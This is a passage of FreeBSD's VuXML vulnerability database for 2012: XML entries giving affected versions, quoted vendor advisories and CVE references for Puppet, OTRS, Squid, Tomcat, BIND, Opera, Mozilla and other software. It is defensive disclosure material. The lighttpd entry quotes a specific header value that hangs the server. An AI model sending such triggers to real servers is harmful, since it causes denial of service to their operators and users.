mirror/freebsd-ports
1
0
Fork 0
mirror of https://git.FreeBSD.org/ports.git synced 2024-12-20 04:02:27 +00:00
Code Issues Releases Activity
6d244f048c
freebsd-ports/security/vuxml/vuln-2012.xml
Baptiste Daroussin e14ed8232d Rework vuxml a bit to make them validable again 
modify tidy.xsl to make it generates manually the xml declaration
xsl is not able to generate a list of entity otherwise.

Remove copyright form included files, they are redudundant anyway and
in the end only the vuln.xml file is distribued with entities expanded

Rework a bit the entity declaration in order for the document to look
great after expansion (as it did before we introduced the expansion
mechanism)

All validation are now processed direcly on the flattened file.

This is based on a patch from mfechner here

Submitted by:		mfechner
Differential Revision:	https://reviews.freebsd.org/D28299
2021-01-25 17:16:21 +00:00

9289 lines
335 KiB
XML
Raw Blame History

<vuln vid="101f0aae-52d1-11e2-87fe-f4ce46b9ace8">
<topic>puppet -- multiple vulnerabilities</topic>
<affects>
<package>
<name>puppet</name>
<range><gt>2.6.*</gt><lt>2.6.17</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>puppet -- multiple vulnerabilities</p>
<blockquote cite="http://projects.puppetlabs.com/projects/puppet/wiki/Release_Notes#2.6.17">
<p>Arbitrary file read on the puppet master from authenticated clients (high). It is possible to construct an HTTP get request from an authenticated client with a valid certificate that will return the contents of an arbitrary file on the Puppet master that the master has read-access to.</p>
<p>Arbitrary file delete/D.O.S on Puppet Master from authenticated clients (high). Given a Puppet master with the "Delete" directive allowed in auth.conf for an authenticated host, an attacker on that host can send a specially crafted Delete request that can cause an arbitrary file deletion on the Puppet master, potentially causing a denial of service attack. Note that this vulnerability does *not* exist in Puppet as configured by default.</p>
<p>Insufficient input validation for agent hostnames (low). An attacker could trick the administrator into signing an attacker's certificate rather than the intended one by constructing specially crafted certificate requests containing specific ANSI control sequences. It is possible to use the sequences to rewrite the order of text displayed to an administrator such that display of an invalid certificate and valid certificate are transposed. If the administrator signs the attacker's certificate, the attacker can then man-in-the-middle the agent.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3864</cvename>
<cvename>CVE-2012-3865</cvename>
<cvename>CVE-2012-3867</cvename>
<url>http://projects.puppetlabs.com/projects/puppet/wiki/Release_Notes#2.6.17</url>
<url>http://puppetlabs.com/security/cve/cve-2012-3864/</url>
<url>http://puppetlabs.com/security/cve/cve-2012-3865/</url>
<url>http://puppetlabs.com/security/cve/cve-2012-3867/</url>
</references>
<dates>
<discovery>2012-07-10</discovery>
<entry>2012-12-30</entry>
</dates>
</vuln>
<vuln vid="13320091-52a6-11e2-a289-1c4bd681f0cf">
<topic>otrs -- XSS vulnerability</topic>
<affects>
<package>
<name>otrs</name>
<range><lt>3.1.11</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>OTRS Security Advisory reports:</p>
<blockquote cite="http://www.otrs.com/open-source/community-news/security-advisories/security-advisory-2012-03/">
<p>This advisory covers vulnerabilities discovered in the OTRS core
system. This is a variance of the XSS vulnerability, where an attacker could
send a specially prepared HTML email to OTRS which would cause JavaScript code
to be executed in your browser while displaying the email. In this case this is
achieved by using javascript source attributes with whitespaces.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4751</cvename>
<url>http://www.otrs.com/en/open-source/community-news/security-advisories/security-advisory-2012-03/</url>
<url>http://www.kb.cert.org/vuls/id/603276</url>
</references>
<dates>
<discovery>2012-10-16</discovery>
<entry>2012-12-30</entry>
</dates>
</vuln>
<vuln vid="95a69d1a-52a5-11e2-a289-1c4bd681f0cf">
<topic>otrs -- XSS vulnerability in Firefox and Opera</topic>
<affects>
<package>
<name>otrs</name>
<range><lt>3.1.10</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>OTRS Security Advisory reports:</p>
<blockquote cite="http://www.otrs.com/open-source/community-news/security-advisories/security-advisory-2012-02/">
<p>This advisory covers vulnerabilities discovered in the OTRS core
system. This is a variance of the XSS vulnerability, where an attacker could
send a specially prepared HTML email to OTRS which would cause JavaScript code
to be executed in your browser while displaying the email in Firefox and Opera.
In this case this is achieved with an invalid HTML structure with nested tags.
</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4600</cvename>
<url>http://www.otrs.com/open-source/community-news/security-advisories/security-advisory-2012-02/</url>
</references>
<dates>
<discovery>2012-08-30</discovery>
<entry>2012-12-30</entry>
</dates>
</vuln>
<vuln vid="49a6026a-52a3-11e2-a289-1c4bd681f0cf">
<topic>otrs -- XSS vulnerability in Internet Explorer</topic>
<affects>
<package>
<name>otrs</name>
<range><lt>3.1.9</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>OTRS Security Advisory reports:</p>
<blockquote cite="http://www.otrs.com/open-source/community-news/security-advisories/security-advisory-2012-01/">
<p>This advisory covers vulnerabilities discovered in the OTRS core
system. Due to the XSS vulnerability in Internet Explorer an attacker could send
a specially prepared HTML email to OTRS which would cause JavaScript code to be
executed in your Internet Explorer while displaying the email.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2582</cvename>
<url>http://www.otrs.com/open-source/community-news/security-advisories/security-advisory-2012-01/</url>
</references>
<dates>
<discovery>2012-08-22</discovery>
<entry>2012-12-30</entry>
</dates>
</vuln>
<vuln vid="c37de843-488e-11e2-a5c9-0019996bc1f7">
<topic>squid -- denial of service</topic>
<affects>
<package>
<name>squid</name>
<range><lt>2.7.9_4</lt></range>
<range><ge>3.1</ge><lt>3.1.23</lt></range>
<range><ge>3.2</ge><lt>3.2.6</lt></range>
<range><ge>3.3</ge><lt>3.3.0.3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Squid developers report:</p>
<blockquote cite="http://www.squid-cache.org/Advisories/SQUID-2012_1.txt">
<p>Due to missing input validation Squid cachemgr.cgi tool
is vulnerable to a denial of service attack when processing
specially crafted requests.</p>
<p>This problem allows any client able to reach the
cachemgr.cgi to perform a denial of service attack on the
service host.</p>
<p>The nature of the attack may cause secondary effects
through resource consumption on the host server.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5643</cvename>
<cvename>CVE-2013-0189</cvename>
<url>http://www.squid-cache.org/Advisories/SQUID-2012_1.txt</url>
</references>
<dates>
<discovery>2012-12-17</discovery>
<entry>2012-12-28</entry>
<modified>2013-05-02</modified>
</dates>
</vuln>
<vuln vid="85f33a8d-492f-11e2-aa75-003067c2616f">
<topic>opera -- execution of arbitrary code</topic>
<affects>
<package>
<name>opera</name>
<range><lt>12.12</lt></range>
</package>
<package>
<name>opera-devel</name>
<range><lt>12.12</lt></range>
</package>
<package>
<name>linux-opera</name>
<range><lt>12.12</lt></range>
</package>
<package>
<name>linux-opera-devel</name>
<range><lt>12.12</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Opera reports:</p>
<blockquote cite="http://www.opera.com/support/kb/view/1038/">
<p>When loading GIF images into memory, Opera should allocate the
correct amount of memory to store that image. Specially crafted
image files can cause Opera to allocate the wrong amount of memory.
Subsequent data may then overwrite unrelated memory with
attacker-controlled data. This can lead to a crash, which may also
execute that data as code.</p>
</blockquote>
</body>
</description>
<references>
<url>http://www.opera.com/support/kb/view/1038/</url>
<url>http://www.opera.com/support/kb/view/1039/</url>
</references>
<dates>
<discovery>2012-12-18</discovery>
<entry>2012-12-18</entry>
<modified>2014-04-30</modified>
</dates>
</vuln>
<vuln vid="1657a3e6-4585-11e2-a396-10bf48230856">
<topic>linux-flashplugin -- multiple vulnerabilities</topic>
<affects>
<package>
<name>linux-f10-flashplugin</name>
<range><lt>11.2r202.258</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Adobe reports:</p>
<blockquote cite="https://www.adobe.com/support/security/bulletins/apsb12-27.html">
<p>These updates address vulnerabilities that could cause a crash
and potentially allow an attacker to take control of the affected system.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5676</cvename>
<cvename>CVE-2012-5677</cvename>
<cvename>CVE-2012-5678</cvename>
<url>https://www.adobe.com/support/security/bulletins/apsb12-27.html</url>
</references>
<dates>
<discovery>2012-12-11</discovery>
<entry>2012-12-14</entry>
</dates>
</vuln>
<vuln vid="953911fe-51ef-11e2-8e34-0022156e8794">
<topic>tomcat -- bypass of CSRF prevention filter</topic>
<affects>
<package>
<name>tomcat</name>
<range><ge>6.0.0</ge><le>6.0.35</le></range>
</package>
<package>
<name>tomcat7</name>
<range><ge>7.0.0</ge><le>7.0.31</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Apache Software Foundation reports:</p>
<blockquote cite="http://tomcat.apache.org/security-7.html">
<p>The CSRF prevention filter could be bypassed if a request was made to a
protected resource without a session identifier present in the request.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4431</cvename>
<url>http://tomcat.apache.org/security-6.html</url>
<url>http://tomcat.apache.org/security-7.html</url>
</references>
<dates>
<discovery>2012-12-04</discovery>
<entry>2012-12-04</entry>
<modified>2017-03-18</modified>
</dates>
</vuln>
<vuln vid="134acaa2-51ef-11e2-8e34-0022156e8794">
<topic>tomcat -- denial of service</topic>
<affects>
<package>
<name>tomcat</name>
<range><ge>6.0.0</ge><le>6.0.35</le></range>
</package>
<package>
<name>tomcat7</name>
<range><ge>7.0.0</ge><le>7.0.27</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Apache Software Foundation reports:</p>
<blockquote cite="http://tomcat.apache.org/security-7.html">
<p>When using the NIO connector with sendfile and HTTPS enabled, if a
client breaks the connection while reading the response an infinite loop
is entered leading to a denial of service.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4534</cvename>
<url>http://tomcat.apache.org/security-6.html</url>
<url>http://tomcat.apache.org/security-7.html</url>
</references>
<dates>
<discovery>2012-12-04</discovery>
<entry>2012-12-04</entry>
<modified>2017-03-18</modified>
</dates>
</vuln>
<vuln vid="f599dfc4-3ec2-11e2-8ae1-001a8056d0b5">
<topic>tomcat -- bypass of security constraints</topic>
<affects>
<package>
<name>tomcat</name>
<range><ge>6.0.0</ge><le>6.0.35</le></range>
</package>
<package>
<name>tomcat7</name>
<range><ge>7.0.0</ge><le>7.0.29</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Apache Software Foundation reports:</p>
<blockquote cite="http://tomcat.apache.org/security-7.html">
<p>When using FORM authentication it was possible to bypass the security
constraint checks in the FORM authenticator by appending
"/j_security_check" to the end of the URL if some other component
(such as the Single-Sign-On valve) had called request.setUserPrincipal()
before the call to FormAuthenticator#authenticate().</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3546</cvename>
<url>http://tomcat.apache.org/security-6.html</url>
<url>http://tomcat.apache.org/security-7.html</url>
</references>
<dates>
<discovery>2012-12-04</discovery>
<entry>2012-12-04</entry>
<modified>2017-03-18</modified>
</dates>
</vuln>
<vuln vid="2892a8e2-3d68-11e2-8e01-0800273fe665">
<topic>dns/bind9* -- servers using DNS64 can be crashed by a crafted query</topic>
<affects>
<package>
<name>bind99</name>
<range><lt>9.9.2.1</lt></range>
</package>
<package>
<name>bind99-base</name>
<range><lt>9.9.2.1</lt></range>
</package>
<package>
<name>bind98</name>
<range><lt>9.8.4.1</lt></range>
</package>
<package>
<name>bind98-base</name>
<range><lt>9.8.4.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>ISC reports:</p>
<blockquote cite="https://kb.isc.org/article/AA-00828">
<p>BIND 9 nameservers using the DNS64 IPv6 transition mechanism are
vulnerable to a software defect that allows a crafted query to
crash the server with a REQUIRE assertion failure. Remote
exploitation of this defect can be achieved without extensive
effort, resulting in a denial-of-service (DoS) vector against
affected servers.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5688</cvename>
</references>
<dates>
<discovery>2012-11-27</discovery>
<entry>2012-12-04</entry>
</dates>
</vuln>
<vuln vid="f524d8e0-3d83-11e2-807a-080027ef73ec">
<topic>bogofilter -- heap corruption by invalid base64 input</topic>
<affects>
<package> <name>bogofilter</name> <range><lt>1.2.3</lt></range> </package>
<package> <name>bogofilter-sqlite</name> <range><lt>1.2.3</lt></range> </package>
<package> <name>bogofilter-tc</name> <range><lt>1.2.3</lt></range> </package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>David Relson reports:</p>
<blockquote cite="https://bogofilter.svn.sourceforge.net/svnroot/bogofilter/trunk/bogofilter/NEWS">
<p>Fix a heap corruption in base64 decoder on invalid input.
Analysis and patch by Julius Plenz, [FU Berlin, Germany].</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5468</cvename>
<url>http://bogofilter.sourceforge.net/security/bogofilter-SA-2012-01</url>
</references>
<dates>
<discovery>2012-10-17</discovery>
<entry>2012-12-03</entry>
</dates>
</vuln>
<vuln vid="aa4f86af-3172-11e2-ad21-20cf30e32f6d">
<topic>YUI JavaScript library -- JavaScript injection exploits in Flash components</topic>
<affects>
<package>
<name>yahoo-ui</name>
<range><le>2.8.2</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The YUI team reports:</p>
<blockquote cite="http://yuilibrary.com/support/20121030-vulnerability/">
<h1>Vulnerability in YUI 2.4.0 through YUI 2.9.0</h1>
<p>A XSS vulnerability has been discovered in some YUI 2 .swf files
from versions 2.4.0 through 2.9.0. This defect allows JavaScript
injection exploits to be created against domains that host affected
YUI .swf files.</p>
<p>If your site loads YUI 2 from a CDN (yui.yahooapis.com,
ajax.googleapis.com, etc.) and not from your own domain, you
are not affected. YUI 3 is not affected by this issue.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5881</cvename>
<cvename>CVE-2012-5882</cvename>
<url>http://yuilibrary.com/support/20121030-vulnerability/</url>
</references>
<dates>
<discovery>2012-10-30</discovery>
<entry>2012-11-27</entry>
<modified>2012-11-29</modified>
</dates>
</vuln>
<vuln vid="5536c8e4-36b3-11e2-a633-902b343deec9">
<topic>FreeBSD -- Linux compatibility layer input validation error</topic>
<affects>
<package>
<name>FreeBSD</name>
<range><ge>7.4</ge><lt>7.4_11</lt></range>
<range><ge>8.3</ge><lt>8.3_5</lt></range>
<range><ge>9.0</ge><lt>9.0_5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Problem description:</p>
<blockquote cite="http://www.freebsd.org/security/advisories/FreeBSD-SA-12:08.linux.asc">
<p>A programming error in the handling of some Linux system calls
may result in memory locations being accessed without proper
validation.</p>
</blockquote>
</body>
</description>
<references>
<freebsdsa>SA-12:08.linux</freebsdsa>
<cvename>CVE-2012-4576</cvename>
</references>
<dates>
<discovery>2012-11-22</discovery>
<entry>2012-11-24</entry>
</dates>
</vuln>
<vuln vid="f115f693-36b2-11e2-a633-902b343deec9">
<topic>FreeBSD -- Insufficient message length validation for EAP-TLS messages</topic>
<affects>
<package>
<name>FreeBSD</name>
<range><ge>8.3</ge><lt>8.3_5</lt></range>
<range><ge>9.0</ge><lt>9.0_5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Problem description:</p>
<blockquote cite="http://www.freebsd.org/security/advisories/FreeBSD-SA-12:07.hostapd.asc">
<p>The internal authentication server of hostapd does not
sufficiently validate the message length field of EAP-TLS
messages.</p>
</blockquote>
</body>
</description>
<references>
<freebsdsa>SA-12:07.hostapd</freebsdsa>
<cvename>CVE-2012-4445</cvename>
</references>
<dates>
<discovery>2012-11-22</discovery>
<entry>2012-11-24</entry>
</dates>
</vuln>
<vuln vid="4b79538b-a450-11e2-9898-001060e06fd4">
<topic>FreeBSD -- Multiple Denial of Service vulnerabilities with named(8)</topic>
<affects>
<package>
<name>FreeBSD</name>
<range><ge>7.4</ge><lt>7.4_11</lt></range>
<range><ge>8.3</ge><lt>8.3_5</lt></range>
<range><ge>9.0</ge><lt>9.0_5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Problem description:</p>
<blockquote cite="http://www.freebsd.org/security/advisories/FreeBSD-SA-12:06.bind.asc">
<p>The BIND daemon would crash when a query is made on a resource
record with RDATA that exceeds 65535 bytes.</p>
<p>The BIND daemon would lock up when a query is made on specific
combinations of RDATA.</p>
</blockquote>
</body>
</description>
<references>
<freebsdsa>SA-12:06.bind</freebsdsa>
<cvename>CVE-2012-4244</cvename>
<cvename>CVE-2012-5166</cvename>
</references>
<dates>
<discovery>2012-11-22</discovery>
<entry>2012-11-24</entry>
</dates>
</vuln>
<vuln vid="0925716f-34e2-11e2-aa75-003067c2616f">
<topic>opera -- execution of arbitrary code</topic>
<affects>
<package>
<name>opera</name>
<range><lt>12.11</lt></range>
</package>
<package>
<name>opera-devel</name>
<range><lt>12.11</lt></range>
</package>
<package>
<name>linux-opera</name>
<range><lt>12.11</lt></range>
</package>
<package>
<name>linux-opera-devel</name>
<range><lt>12.11</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Opera reports:</p>
<blockquote cite="http://www.opera.com/support/kb/view/1036/">
<p>When requesting pages using HTTP, Opera temporarily stores the
response in a buffer. In some cases, Opera may incorrectly allocate
too little space for a buffer, and may then store too much of the
response in that buffer. This causes a buffer overflow, which in
turn can lead to a memory corruption and crash. It is possible to
use this crash to execute the overflowing data as code, which may
be controlled by an attacking site.</p>
</blockquote>
</body>
</description>
<references>
<url>http://www.opera.com/support/kb/view/1036/</url>
</references>
<dates>
<discovery>2012-11-19</discovery>
<entry>2012-11-22</entry>
<modified>2014-04-30</modified>
</dates>
</vuln>
<vuln vid="1cd3ca42-33e6-11e2-a255-5404a67eef98">
<topic>lighttpd -- remote DoS in header parsing</topic>
<affects>
<package>
<name>lighttpd</name>
<range><gt>1.4.30</gt><lt>1.4.32</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Lighttpd security advisory reports:</p>
<blockquote cite="http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2012_01.txt">
<p>Certain Connection header values will trigger an endless loop, for example:
"Connection: TE,,Keep-Alive"</p>
<p>On receiving such value, lighttpd will enter an endless loop,
detecting an empty token but not incrementing the current string
position, and keep reading the ',' again and again.</p>
<p>This bug was introduced in 1.4.31, when we fixed an "invalid read"
bug (it would try to read the byte before the string if it started
with ',', although the value wasn't actually used).</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5533</cvename>
</references>
<dates>
<discovery>2012-11-17</discovery>
<entry>2012-11-21</entry>
</dates>
</vuln>
<vuln vid="d23119df-335d-11e2-b64c-c8600054b392">
<topic>mozilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>firefox</name>
<range><gt>11.0,1</gt><lt>17.0,1</lt></range>
<range><lt>10.0.11,1</lt></range>
</package>
<package>
<name>linux-firefox</name>
<range><lt>10.0.11,1</lt></range>
</package>
<package>
<name>linux-seamonkey</name>
<range><lt>2.14</lt></range>
</package>
<package>
<name>linux-thunderbird</name>
<range><lt>10.0.11</lt></range>
</package>
<package>
<name>seamonkey</name>
<range><lt>2.14</lt></range>
</package>
<package>
<name>thunderbird</name>
<range><gt>11.0</gt><lt>17.0</lt></range>
<range><lt>10.0.11</lt></range>
</package>
<package>
<name>libxul</name>
<range><gt>1.9.2.*</gt><lt>10.0.11</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Mozilla Project reports:</p>
<blockquote cite="http://www.mozilla.org/security/known-vulnerabilities/">
<p>MFSA 2012-91 Miscellaneous memory safety hazards (rv:17.0/
rv:10.0.11)</p>
<p>MFSA 2012-92 Buffer overflow while rendering GIF images</p>
<p>MFSA 2012-93 evalInSanbox location context incorrectly applied</p>
<p>MFSA 2012-94 Crash when combining SVG text on path with CSS</p>
<p>MFSA 2012-95 Javascript: URLs run in privileged context on New Tab
page</p>
<p>MFSA 2012-96 Memory corruption in str_unescape</p>
<p>MFSA 2012-97 XMLHttpRequest inherits incorrect principal within
sandbox</p>
<p>MFSA 2012-98 Firefox installer DLL hijacking</p>
<p>MFSA 2012-99 XrayWrappers exposes chrome-only properties when not
in chrome compartment</p>
<p>MFSA 2012-100 Improper security filtering for cross-origin
wrappers</p>
<p>MFSA 2012-101 Improper character decoding in HZ-GB-2312 charset</p>
<p>MFSA 2012-102 Script entered into Developer Toolbar runs with
chrome privileges</p>
<p>MFSA 2012-103 Frames can shadow top.location</p>
<p>MFSA 2012-104 CSS and HTML injection through Style Inspector</p>
<p>MFSA 2012-105 Use-after-free and buffer overflow issues found</p>
<p>MFSA 2012-106 Use-after-free, buffer overflow, and memory
corruption issues found using Address Sanitizer</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4201</cvename>
<cvename>CVE-2012-4202</cvename>
<cvename>CVE-2012-4203</cvename>
<cvename>CVE-2012-4204</cvename>
<cvename>CVE-2012-4205</cvename>
<cvename>CVE-2012-4206</cvename>
<cvename>CVE-2012-4207</cvename>
<cvename>CVE-2012-4208</cvename>
<cvename>CVE-2012-4209</cvename>
<cvename>CVE-2012-4210</cvename>
<cvename>CVE-2012-4212</cvename>
<cvename>CVE-2012-4213</cvename>
<cvename>CVE-2012-4214</cvename>
<cvename>CVE-2012-4215</cvename>
<cvename>CVE-2012-4216</cvename>
<cvename>CVE-2012-4217</cvename>
<cvename>CVE-2012-4218</cvename>
<cvename>CVE-2012-5829</cvename>
<cvename>CVE-2012-5830</cvename>
<cvename>CVE-2012-5833</cvename>
<cvename>CVE-2012-5835</cvename>
<cvename>CVE-2012-5836</cvename>
<cvename>CVE-2012-5837</cvename>
<cvename>CVE-2012-5838</cvename>
<cvename>CVE-2012-5839</cvename>
<cvename>CVE-2012-5840</cvename>
<cvename>CVE-2012-5841</cvename>
<cvename>CVE-2012-5842</cvename>
<cvename>CVE-2012-5843</cvename>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-90.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-91.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-92.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-93.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-94.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-95.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-96.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-97.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-98.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-99.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-100.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-101.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-102.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-103.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-104.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-105.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-106.html</url>
<url>http://www.mozilla.org/security/known-vulnerabilities/</url>
</references>
<dates>
<discovery>2012-11-20</discovery>
<entry>2012-11-20</entry>
</dates>
</vuln>
<vuln vid="81826d12-317a-11e2-9186-406186f3d89d">
<topic>weechat -- Arbitrary shell command execution via scripts</topic>
<affects>
<package>
<name>weechat</name>
<range><ge>0.3.0</ge><lt>0.3.9.2</lt></range>
</package>
<package>
<name>weechat-devel</name>
<range><lt>20121118</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Sebastien Helleu reports:</p>
<blockquote cite="http://weechat.org/security/">
<p>Untrusted command for function hook_process could lead to
execution of commands, because of shell expansions.</p>
<p>Workaround with a non-patched version: remove/unload all scripts
calling function hook_process (for maximum safety).</p>
</blockquote>
</body>
</description>
<references>
<url>http://weechat.org/security/</url>
<url>https://savannah.nongnu.org/bugs/?37764</url>
</references>
<dates>
<discovery>2012-11-15</discovery>
<entry>2012-11-18</entry>
<modified>2012-11-18</modified>
</dates>
</vuln>
<vuln vid="2b841f88-2e8d-11e2-ad21-20cf30e32f6d">
<topic>bugzilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>bugzilla</name>
<range><ge>3.6.0</ge><lt>3.6.12</lt></range>
<range><ge>4.0.0</ge><lt>4.0.9</lt></range>
<range><ge>4.2.0</ge><lt>4.2.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<h1>A Bugzilla Security Advisory reports:</h1>
<blockquote cite="http://www.bugzilla.org/security/3.6.11/">
<p>The following security issues have been discovered in
Bugzilla:</p>
<h1>Information Leak</h1>
<p>If the visibility of a custom field is controlled by a product
or a component of a product you cannot see, their names are
disclosed in the JavaScript code generated for this custom field
despite they should remain confidential.</p>
<p>Calling the User.get method with a 'groups' argument leaks the
existence of the groups depending on whether an error is thrown
or not. This method now also throws an error if the user calling
this method does not belong to these groups (independently of
whether the groups exist or not).</p>
<p>Trying to mark an attachment in a bug you cannot see as obsolete
discloses its description in the error message. The description
of the attachment is now removed from the error message.</p>
<h1>Cross-Site Scripting</h1>
<p>Due to incorrectly filtered field values in tabular reports,
it is possible to inject code leading to XSS.</p>
<p>A vulnerability in swfstore.swf from YUI2 allows JavaScript
injection exploits to be created against domains that host this
affected YUI .swf file.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4199</cvename>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=731178</url>
<cvename>CVE-2012-4198</cvename>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=781850</url>
<cvename>CVE-2012-4197</cvename>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=802204</url>
<cvename>CVE-2012-4189</cvename>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=790296</url>
<cvename>CVE-2012-5881</cvename>
<cvename>CVE-2012-5882</cvename>
<cvename>CVE-2012-5883</cvename>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=808845</url>
<url>http://yuilibrary.com/support/20121030-vulnerability/</url>
</references>
<dates>
<discovery>2012-11-13</discovery>
<entry>2012-11-14</entry>
<modified>2012-11-27</modified>
</dates>
</vuln>
<vuln vid="79818ef9-2d10-11e2-9160-00262d5ed8ee">
<topic>typo3 -- Multiple vulnerabilities in TYPO3 Core</topic>
<affects>
<package>
<name>typo3</name>
<range><ge>4.5.0</ge><lt>4.5.21</lt></range>
<range><ge>4.6.0</ge><lt>4.6.14</lt></range>
<range><ge>4.7.0</ge><lt>4.7.6</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Typo Security Team reports:</p>
<blockquote cite="http://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2012-005/">
<p>TYPO3 Backend History Module - Due to missing encoding of user
input, the history module is susceptible to SQL Injection and
Cross-Site Scripting. A valid backend login is required to exploit
this vulnerability. Credits go to Thomas Worm who discovered and
reported the issue.</p>
<p>TYPO3 Backend API - Failing to properly HTML-encode user input the
tree render API (TCA-Tree) is susceptible to Cross-Site Scripting.
TYPO3 Versions below 6.0 does not make us of this API, thus is not
exploitable, if no third party extension is installed which uses
this API. A valid backend login is required to exploit this
vulnerability. Credits go to Richard Brain who discovered and
reported the issue.</p>
</blockquote>
</body>
</description>
<references>
<url>http://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2012-005/</url>
</references>
<dates>
<discovery>2012-11-08</discovery>
<entry>2012-11-12</entry>
</dates>
</vuln>
<vuln vid="a537b449-2b19-11e2-b339-90e6ba652cce">
<topic>DomainKeys Identified Mail (DKIM) Verifiers may inappropriately convey message trust</topic>
<affects>
<package>
<name>opendkim</name>
<range><lt>2.7.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>US-CERT reports:</p>
<blockquote cite="http://www.kb.cert.org/vuls/id/268267">
<p>DomainKeys Identified Mail (DKIM) Verifiers may
inappropriately convey message trust when messages are
signed using test or small bit signing keys.</p>
</blockquote>
</body>
</description>
<references>
<certvu>268267</certvu>
</references>
<dates>
<discovery>2012-10-24</discovery>
<entry>2012-11-12</entry>
</dates>
</vuln>
<vuln vid="e02c572f-2af0-11e2-bb44-003067b2972c">
<topic>weechat -- Crash or freeze when decoding IRC colors in strings</topic>
<affects>
<package>
<name>weechat</name>
<range><ge>0.3.6</ge><lt>0.3.9.1</lt></range>
</package>
<package>
<name>weechat-devel</name>
<range><ge>20110614</ge><lt>20121110</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Sebastien Helleu reports:</p>
<blockquote cite="https://savannah.nongnu.org/bugs/?37704">
<p>A buffer overflow is causing a crash or freeze of WeeChat when
decoding IRC colors in strings.</p>
<p>Workaround for a non-patched version:
/set irc.network.colors_receive off</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5854</cvename>
<freebsdpr>ports/173513</freebsdpr>
<url>http://weechat.org/security/</url>
<url>https://savannah.nongnu.org/bugs/?37704</url>
</references>
<dates>
<discovery>2012-11-09</discovery>
<entry>2012-11-10</entry>
<modified>2012-11-13</modified>
</dates>
</vuln>
<vuln vid="5e647ca3-2aea-11e2-b745-001fd0af1a4c">
<topic>ruby -- Hash-flooding DoS vulnerability for ruby 1.9</topic>
<affects>
<package>
<name>ruby</name>
<range><ge>1.9</ge><lt>1.9.3.327</lt></range>
</package>
</affects>
<description>
